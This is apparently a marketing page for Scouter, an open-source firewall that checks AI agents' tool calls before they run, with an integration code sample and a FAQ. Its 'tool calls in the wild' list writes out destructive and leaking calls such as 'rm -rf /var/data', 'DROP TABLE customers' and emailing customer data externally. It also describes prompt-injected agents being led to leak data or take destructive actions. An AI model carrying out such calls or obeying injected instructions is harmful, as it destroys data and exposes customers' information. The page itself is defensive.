Data leakage
A prompt-injected agent calls send_email() or an external webhook with customer records or internal data attached.
The open-source firewall that checks every agent tool call before execution — blocking data leaks, destructive actions, and unauthorized API calls in real time.
OpenAI · LangChain · CrewAI · custom Python · MCP.
The problem
Your agents now query databases, modify customer records, send emails, call internal APIs, trigger refunds, run shell commands, and reach into production systems.
The risk isn't bad text output. It's unsafe action execution.
A prompt-injected agent calls send_email() or an external webhook with customer records or internal data attached.
Agent fires delete_order(), drop_table(), remove_user(), or cancel_subscription() with no approval gate in front of it.
Agent uses privileged keys to call refund_payment(), modify configs, or hit internal APIs outside its intended role.
Prompt injection → agent reasoning → tool call → production action → business damage.
Once the tool call fires, the damage is real. Scouter checks every action before execution.
How Scouter works
Scouter intercepts every tool call. Evaluates the action, arguments, context, user intent, tool risk, and policy. Then allows, blocks, or escalates — before anything hits production.
Every tool_call is captured before execution.
OpenAI · LangChain · CrewAI · MCP · custom agents.
Policy engine checks the action, args, tool risk, and approval rules.
Allow · Block · Require human approval.
Unsafe actions are blocked before they execute. Every decision is logged.
Signed audit trail · SIEM / SOC ready.
Integration
Wrap your client. Declare what the agent is and isn't allowed to do. Every tool call is now policy-checked before execution.
from scouter.client import ScouterClient
from scouter.integrations.openai import wrap_openai
from openai import OpenAI
# 1. Init Scouter (cloud backend at scouter.intellectmachines.com)
scouter = ScouterClient(
api_key="your-api-key",
mode="enforce", # audit | enforce
)
# 2. Register agent intent
intent = scouter.register_intent(
agent_id="support-bot",
natural_language="Answer customer questions about orders and products",
permitted_actions=["lookup_order", "search_knowledge_base"],
excluded_actions=["delete_order", "modify_payment"],
)
# 3. Wrap your OpenAI client — that's it
client = wrap_openai(OpenAI(api_key="..."), scouter=scouter, intent_id=intent.intent_id)
# 4. Use normally — Scouter governs every call transparently
response = client.chat.completions.create(
model="gpt-4o-mini",
messages=[{"role": "user", "content": "What's my order status for ORD-123?"}],
)
Try it live
Open the live Scouter dashboard, send agent tool calls through the policy engine, and watch unsafe actions get blocked before execution — in real time, on real traffic.
scouter.intellectmachines.com/ui/ · no signup required
Tool calls in the wild
Real agent tool calls. Real policy decisions. Made in milliseconds, before anything reaches production.
delete_order(id="ORD-9921")
Destructive action · approval required
send_email(to="ext@x.com", body=customer_data)
Data leakage · external recipient + PII
run_sql("DROP TABLE customers")
Database write · irreversible operation
execute_shell("rm -rf /var/data")
Shell exec · outside declared scope
refund_payment(amount=999999)
Privileged API · over policy threshold
lookup_order(id="ORD-123")
Within policy · executed & logged
See it live
A support agent with order-tool access is told to delete an order and email customer data externally. Without Scouter, the action executes. With Scouter, it's blocked before execution and logged for review.
Who it's for
Ship agents faster without building your own runtime guardrail system. Open-source SDK, free for dev + staging.
Deploy AI agents with policy enforcement, approval workflows, and signed audit trails. SOC 2, ISO 42001, EU AI Act ready.
See what every agent did, which tool it called, what data it touched, and why the action was allowed — before it becomes an incident.
Without Scouter vs. with Scouter
Monitoring tells you after the damage. IAM checks who, not what. Scouter checks the action itself — and blocks it before execution.
| Observability | IAM | Prompt Injection Protection | Scouter | |
|---|---|---|---|---|
| Blocks unsafe actions | — | — | partial | ✓ real-time |
| Understands agent intent | — | — | — | ✓ registry |
| Prompt injection defense | — | — | ✓ text only | ✓ classifier |
| Shell / SQL / API guards | — | — | — | ✓ 60+ rules |
| Compliance audit trail | partial | auth only | — | ✓ signed |
| Works with agent frameworks | via SDK | — | via SDK | ✓ drop-in |
| Open source | partial | — | partial | ✓ Apache 2.0 |
Build vs. Scouter
A runtime control layer is a 12+ month security engineering project — not a weekend hackathon. Most teams underestimate it until the first agent incident.
• 2–4 senior eng for 6–12 months
• Policy DSL + evaluator
• Fast-path classifier for prompt injection
• Tool-call interceptors per framework (OpenAI, LangChain, CrewAI, MCP)
• Approval workflows + escalation
• Signed audit log + SIEM pipeline
• Ongoing rule maintenance as new attacks emerge
Then maintain it forever, while it's not your core product.
• Wrap your client — minutes, not months
• Policy engine, classifier, and 60+ guards out of the box
• OpenAI, LangChain, CrewAI, MCP, custom Python — already integrated
• Approval gates, audit trail, SIEM hooks built in
• Open source · inspectable · self-hostable
• Threat coverage updated by a team focused only on this
Ship agents to production with boundaries, today.
Most in-house attempts ship a thin allowlist, miss prompt-injection-to-action chains, and end up as a lagging audit log instead of a real enforcement layer.
By the time the gaps surface, an agent has already done something it shouldn't have — and now it's an incident, not a roadmap item.
FAQ
Content filters look at text. Scouter looks at actions. When your agent decides to call delete_order() or send_email(), Scouter evaluates the tool call itself — arguments, context, policy — and blocks it before execution.
Prompt injection is dangerous because agents can execute tools. Even partial defenses leak. Scouter assumes inputs may be hostile and enforces policy at the action layer — the last line before production.
Most calls clear the fast-path in under a millisecond. Risky ones get full policy evaluation (~40ms). Users won't notice.
Yes. The runtime is open source (Apache 2.0). Run it in your own VPC and keep all decisions on your infra. Cloud control plane also available.
OpenAI, LangChain, CrewAI, AutoGen, PhiData, custom Python agents, and MCP-style tool ecosystems.
The SDK, policy engine, and runtime are open source. The enterprise control plane adds centralized policy management, agent inventory, approval workflows, audit dashboards, SIEM integration, SSO, and compliance reporting.
Yes. Run mode="audit" to observe and log without blocking. Switch to mode="enforce" when policy is tuned.
Pricing
The runtime, SDK, and policy engine are free and Apache 2.0. The enterprise control plane is in active development — talk to the founders to shape it.
Free · Apache 2.0
• Full runtime & SDK
• Policy engine + 60+ guards
• Self-host in your VPC
• OpenAI · LangChain · CrewAI · MCP
• Community support
Coming soon
• Centralized policy management
• Agent inventory & approval workflows
• Audit dashboard + SIEM integration
• SSO · RBAC · compliance reporting
• Dedicated support & SLA
IntellectMachines builds runtime security for AI agents. Scouter is the open-source AI Agent Action Firewall. Start with the SDK, scale to the enterprise control plane when you're ready.